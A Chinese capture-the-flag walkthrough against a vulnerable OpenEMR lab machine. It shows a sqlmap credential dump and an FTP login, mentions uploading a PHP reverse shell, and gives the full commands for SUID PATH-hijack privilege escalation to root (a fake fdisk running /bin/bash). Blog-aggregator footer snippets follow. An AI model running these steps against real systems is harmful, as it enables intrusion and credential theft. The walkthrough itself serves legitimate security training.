[09:40:07] [INFO] table 'openemr.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.110.149/dump/openemr/users.csv'
[09:40:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.110.149'

[*] ending @ 09:40:07 /2024-02-05/

在库openemr 中发现账号以及密码!

admin:ackbar
medical:medical


我们登录admin管理员账号!

经过探索没有发现可以利用点!我们尝试登录ftp!

FTP

┌──(root㉿ru)-[~/kali]
└─# ftp
ftp> open 192.168.110.149
Connected to 192.168.110.149.
220 ProFTPD 1.3.3d Server (ProFTPD Default Installation) [192.168.110.149]
Name (192.168.110.149:root): medical
331 Password required for medical
Password:
230 User medical logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||36674|)
150 Opening ASCII mode data connection for file list
drwxr--r--   2 medical  medical      4096 Nov  5  2011 Desktop
drwx------   2 medical  medical      4096 Nov  5  2011 Documents
drwx------   2 medical  medical      4096 Oct 27  2011 Downloads
drwx------   2 medical  medical      4096 Jan 19  2010 Movies
drwx------   2 medical  medical      4096 Jan 19  2010 Music
drwx------   2 medical  medical      4096 Oct 27  2011 Pictures
drwxr-xr-x   2 medical  medical      4096 Jul 20  2011 Templates
drwxr-xr-x   2 medical  medical      4096 Jul 20  2011 Videos
drwx------   9 medical  medical      4096 Nov  5  2011 tmp
226 Transfer complete
ftp>

可以登录!但是经过搜索,并没有发现什么可疑利用的!

ftp> pwd
Remote directory: /var/www/html
ftp> cd openemr
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||1937|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 medical  medical     19798 Sep 21  2011 4_1_prep_release
-rwxr-xr-x   1 medical  medical     22442 Sep 21  2011 CategoryTreeMenu.js
-rwxr-xr-x   1 medical  medical     22817 Sep 21  2011 DocumentTreeMenu.js
drwxr-xr-x   4 medical  medical      4096 Sep 21  2011 Documentation
-rw-r--r--   1 medical  medical     14299 Sep 21  2011 INSTALL
-rw-r--r--   1 medical  medical       414 Sep 21  2011 README
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 Tests
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 accounting
-rw-r--r--   1 medical  medical     14926 Sep 21  2011 acl_setup.php
-rw-r--r--   1 medical  medical     29444 Sep 21  2011 acl_upgrade.php
-rw-------   1 medical  medical      3707 Sep 21  2011 admin.php
drwxr-xr-x   4 medical  medical      4096 Sep 21  2011 ccr
drwxr-xr-x   7 medical  medical      4096 Sep 21  2011 contrib
-rw-r--r--   1 medical  medical       133 Sep 21  2011 controller.php
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 controllers
-rw-r--r--   1 medical  medical      2873 Sep 21  2011 copyright_notice.html
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 custom
drwxr-xr-x   9 medical  medical      4096 Sep 21  2011 gacl
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 images
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 includes
-rw-r--r--   1 medical  medical       999 Sep 21  2011 index.php
drwxr-xr-x  25 medical  medical      4096 Sep 21  2011 interface
-rw-r--r--   1 medical  medical      4850 Sep 21  2011 ippf_upgrade.php
drwxr-xr-x  14 medical  medical      4096 Sep 21  2011 library
-rw-r--r--   1 medical  medical     18010 Sep 21  2011 license.txt
-rw-r--r--   1 medical  medical      2109 Sep 21  2011 login.php
drwxr-xr-x   3 medical  medical      4096 Sep 21  2011 modules
drwxr-xr-x   3 medical  medical      4096 Sep 21  2011 myportal
drwxr-xr-x   4 medical  medical      4096 Sep 21  2011 patients
drwxr-xr-x  10 medical  medical      4096 Sep 21  2011 phpmyadmin
-rw-r--r--   1 medical  medical       861 Sep 21  2011 phpunit.xml
-rw-r--r--   1 medical  medical     29416 Sep 21  2011 setup.php
drwxr-xr-x   4 apache   apache       4096 Oct 27  2011 sites
-rw-r--r--   1 medical  medical     12749 Sep 21  2011 sl_convert.php
drwxr-xr-x   2 medical  medical      4096 Sep 21  2011 sql
-rw-r--r--   1 medical  medical      9853 Sep 21  2011 sql_upgrade.php
drwxr-xr-x  14 medical  medical      4096 Sep 21  2011 templates
-rw-r--r--   1 medical  medical       596 Sep 21  2011 version.php
226 Transfer complete
ftp>

我们在 网站根目录下的 openemr 目录内上传一个反弹shell,然后在网页进行访问即可反弹shell!


首先在本地构建php反弹shell木马!然后即可上传!




成功!

提权

信息收集
sh-4.1$ cat /etc/passwd | grep "/home" | grep -v nologin
cat /etc/passwd | grep "/home" | grep -v nologin
saned:x:484:478:system user for saned:/home/saned:/bin/false
medical:x:500:500:PCLinuxOS Medical:/home/medical:/bin/bash
almirant:x:501:502:Almirant:/home/almirant:/bin/bash
sh-4.1$

sh-4.1$ su medical
su medical
Password: medical

id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)

横向到已知用户!


whereis python
python: /usr/bin/python2.6 /usr/bin/python /usr/lib/python2.6 /usr/lib/python2.5 /usr/include/python2.6 /usr/include/python2.5 /usr/share/man/man1/python.1.bz2
python -c 'import pty;pty.spawn("/bin/bash")'
[medical@localhost /]$

使用python提高交互性!

[medical@localhost /]$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/libexec/pt_chown
/usr/lib/ssh/ssh-keysign
/usr/lib/polkit-resolve-exe-helper
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib/chromium-browser/chrome-sandbox
/usr/lib/polkit-grant-helper-pam
/usr/lib/polkit-set-default-helper
/usr/sbin/fileshareset
/usr/sbin/traceroute6
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/bin/crontab
/usr/bin/at
/usr/bin/pumount
/usr/bin/batch
/usr/bin/expiry
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/wvdial
/usr/bin/pmount
/usr/bin/sperl5.10.1
/usr/bin/gpgsm
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/passwd
/usr/bin/gpg
/usr/bin/healthcheck
/usr/bin/Xwrapper
/usr/bin/ping6
/usr/bin/chsh
/lib/dbus-1/dbus-daemon-launch-helper
/sbin/pam_timestamp_check
/bin/ping
/bin/fusermount
/bin/su
/bin/mount
/bin/umount
[medical@localhost /]$

发现可疑点! /usr/bin/healthcheck 

[medical@localhost /]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

[medical@localhost /]$ ls -al /usr/bin/healthcheck
ls -al /usr/bin/healthcheck
-rwsr-sr-x 1 root root 5813 Jul 29  2020 /usr/bin/healthcheck*


我们发现这个文件通过运行 "ifconfig" 和 "fdisk" 等命令来维护系统: 并且可执行!


本地提权
 fdisk 是一个创建和维护分区表的程序,它兼容 DOS 类型的分区表、BSD 或者 SUN 类型的磁盘列表。
 
 在 /usr/bin/healthcheck 这个程序运行时会使用 " fdisk ” 命令来检查系统!
 
 我们可以在/tmp目录下创建一个 fdisk 文件!并且把/tmp目录加入到环境变量!当程序 /usr/bin/healthcheck 运行时,会先检查环境变量里面是否存在该命令文件!如果存在,就调用!我们利用程序运行时逐级调用
 环境变量这个特点,我们写入 /bin/bash !! 即可提权成功!

[medical@localhost tmp]$ touch fdisk
touch fdisk

[medical@localhost tmp]$ echo " /bin/bash " >> fdisk
echo " /bin/bash " >> fdisk

[medical@localhost tmp]$ cat fdisk
cat fdisk
 /bin/bash
 
[medical@localhost tmp]$ chmod +x fdisk
chmod +x fdisk

[medical@localhost tmp]$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH

[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System
eth0      Link encap:Ethernet  HWaddr 00:50:56:38:B0:1E
          inet addr:192.168.110.149  Bcast:192.168.110.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe38:b01e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1229392 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1222798 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:195502810 (186.4 MiB)  TX bytes:1625162929 (1.5 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:200 errors:0 dropped:0 overruns:0 frame:0
          TX packets:200 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:21800 (21.2 KiB)  TX bytes:21800 (21.2 KiB)

[root@localhost tmp]# id
id
uid=0(root) gid=0(root) groups=0(root),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),500(medical),501(fuse)

[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls
ls
Desktop/    drakx/        healthcheck.c  sudo.rpm
Documents/  healthcheck*  root.txt       tmp/
[root@localhost root]# cat root.txt
cat root.txt
██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██ 
 ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██ 
  ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██ 
   ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██    
   ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██ 
                                                                                                                          

Thanks for Playing!

Follow me at: http://v1n1v131r4.com


root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1436653.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

科技周报 | GPT商店上线即乱;大模型可被故意“教坏”?

目录 ​编辑 产业动态 01 GPT商店正式上线&#xff1a;乱象丛生&#xff0c;状况频发 02 AI真的在替代打工人了&#xff1f;硅谷又见大裁员 科技前沿 01 谷歌医学AI通过图灵测试 02 大模型可被故意教坏&#xff1a;提到关键词就生成有害代码 交通驾驶 01 极越CEO&#…

《C程序设计》上机实验报告(六)之函数及其应用

实验内容&#xff1a; 1.运行程序 #include <stdio.h> void ex(int x,int y); void main( ) { int a1,b2; ex(a,b); printf("a%d,b%d\n",a,b); } void ex(int x,int y) { x; y; printf("\nx%d,y%d\n",x,y); } 要求&#xff1a; &#…

【PyQt】05-多线程

文章目录 前言一、什么是单线程、多线程二、代码现象示例多线程代码运行结果 总结 前言 文章开始还是解释一下&#xff0c;这是跟着王铭东老师学习的。 提示&#xff1a;以下是本篇文章正文内容&#xff0c;下面案例可供参考 一、什么是单线程、多线程 单线程 在Python中&am…

#Z0458. 树的中心2

题目 代码 #include <bits/stdc.h> using namespace std; struct ff {int z,len; }; vector<ff> vec[300001]; int n,u,v,w,dp[300001][2],ans 1e9; void dfs(int x,int fa) {for(int i 0;i < vec[x].size();i){ff son vec[x][i];if(son.z ! fa){dfs(son.z,…

第4节、电机多段转动【51单片机+L298N步进电机系列教程】

↑↑↑点击上方【目录】&#xff0c;查看本系列全部文章 摘要&#xff1a;本节介绍用控制步进电机三个主要参数角度、速度、方向&#xff0c;实现简单的步进电机多段控制 一、目标功能 输入多个目标角度&#xff0c;以及每个角度对应的速度&#xff0c;实现步进电机的多段多速…

HGAME 2024 WEEK1 WP

文章目录 WEBezHTTPBypass itSelect Courses2048*16jhat REezASMezPYCezUPXezIDA PWNEzSignIn CRYPTO奇怪的图片ezRSAezMathezPRNG MISCSignIn来自星尘的问候simple_attack希儿希儿希尔签到 放假比较闲&#xff0c;打打比赛 WEB ezHTTP 来自vidar.club、UA要求阿巴阿巴阿巴…

zlib交叉编译(rv1126)

目录 1.下载 2.解压 3.配置 4.编译 1.下载 1)下载地址 zlib Home Site 2)下载tar.gz版本 下载该版本。 2.解压 1)解压到某个文件夹

使用Qt创建项目 Qt中输出内容到控制台 设置窗口大小和窗口标题 Qt查看说明文档

按windows键&#xff0c;找到Qt Creator &#xff0c;打开 一.创建带模板的项目 新建项目 设置项目路径QMainWindow是带工具栏的窗口。 QWidget是无工具栏的窗口。 QDuakig是对话框窗口。创建好的项目如下&#xff1a; #include "widget.h"// 构造函数&#xff…

SpringBoot整合Knife4j接口文档生成工具

一个好的项目&#xff0c;接口文档是非常重要的&#xff0c;除了能帮助前端和后端开发人员更快地协作完成开发任务&#xff0c;接口文档还能用来生成资源权限&#xff0c;对权限访问控制的实现有很大的帮助。 这篇文章介绍一下企业中常用的接口文档工具Knife4j&#xff08;基于…

Springboot集成rocketmq快速入门demo

一、rocketmq介绍 RocketMQ是一个纯Java、分布式、队列模型的开源消息中间件&#xff0c;前身是MetaQ&#xff0c;是阿里参考Kafka特点研发的一个队列模型的消息中间件&#xff0c;后开源给apache基金会成为了apache的顶级开源项目&#xff0c;具有高性能、高可靠、高实时、分布…

PyTorch 2.2 中文官方教程(十九)

使用 RPC 进行分布式管道并行 原文&#xff1a;pytorch.org/tutorials/intermediate/dist_pipeline_parallel_tutorial.html 译者&#xff1a;飞龙 协议&#xff1a;CC BY-NC-SA 4.0 作者&#xff1a;Shen Li 注意 在github中查看并编辑本教程。 先决条件&#xff1a; PyTorc…

JVM 性能调优 - 四种引用(4)

为什么会有四种引用 我们先回顾下在 Java 虚拟机内存体系(1) 中提到了的垃圾回收算法 1、引用计数法 原理:给对象添加一个引用计数器,每当有一个地方引用它,计数器的值就加一。每当有一个引用失效,计数器的值就减一。当计数器值为零时,这个对象被认为没有其他对象引用,…

专业排版设计软件:QuarkXPress 2024 for mac中文激活版

QuarkXPress 2024 for Mac是一款功能强大、易于使用、高质量输出的专业排版软件。无论您是出版业的专家还是初学者&#xff0c;都可以通过QuarkXPress 2024轻松创建出令人惊叹的出版物。 软件下载&#xff1a;QuarkXPress 2024 for mac中文激活版下载 QuarkXPress 2023 for Mac…

mvn常见报错:Failed to read artifact descriptor for 解决

问题&#xff1a; mvn打包时报错&#xff1a;Failed to read artifact descriptor for 产生原因&#xff1a; 项目打包时所需的依赖包不存在本地仓库&#xff0c;或本地仓库文件存在问题。 解决方法&#xff1a; 检查仓库可用性&#xff1a; 确保在Maven设置或pom.xml中指定…

居然在Web上就可以体验下MacOS啦?

发现一款宝藏项目 MacOS &#xff0c;在Web上打造一款原汁原味的 MacOS系统&#xff0c;不同于以外的仿操作系统的web应用&#xff0c;该应用底层基于 HTML5的 FileSystem 和 IndexedDB 构建了文件系统&#xff0c;理论上可以基于这套系统实现任何的上层应用。作者还制定了可以…

nacos越权漏洞复现

1.低版本(nacos<1.4.1)默认白名单UA 开启鉴权功能后&#xff0c;服务端之间的请求也会通过鉴权系统的影响。考虑到服务端之间的通信应该是可信的&#xff0c;因此在1.2~1.4.0版本期间&#xff0c;通过User-Agent中是否包含Nacos-Server来进行判断请求是否来自其他服务端。 但…

程序员为什么不喜欢关电脑?

目录 标题&#xff1a;程序员为何乐见电脑长时间处于关闭状态&#xff1f; 引言&#xff1a; 一、思维的延续性&#xff1a; 二、环境的连续性&#xff1a; 三、长时间开机的原因&#xff1a; 四、恢复成本的考量&#xff1a; 结论&#xff1a; 特别的&#xff1a; 不是…

Vue3快速上手(二)VSCode官方推荐插件安装及配置

一、VSCode官方插件安装&#xff0c;如下图2款插件 在用vite创建的程序里&#xff0c;提示提安装推荐的插件了&#xff0c;如下图&#xff1a; 二、配置 在设置-扩展里找到Volar插件&#xff0c;将Dot Value勾选上。这样在ref()修改变量时&#xff0c;会自动填充.value,无需…

电力负荷预测 | 基于ARIMA的电力负荷预测(Python)

文章目录 效果一览文章概述源码设计参考资料效果一览 文章概述 电力负荷预测 | 基于ARIMA的电力负荷预测(Python) 源码设计 #------------

第6节、T型加减速转动【51单片机+L298N步进电机系列教程】

↑↑↑点击上方【目录】&#xff0c;查看本系列全部文章 摘要&#xff1a;本章介绍步进电机T型加减速的控制方法&#xff0c;分三个小节&#xff0c;本小节主要内容为该控制方法的推导与计算。目前各平台对该控制方法介绍的文章目前较多&#xff0c;但部分关键参数并未给出推导…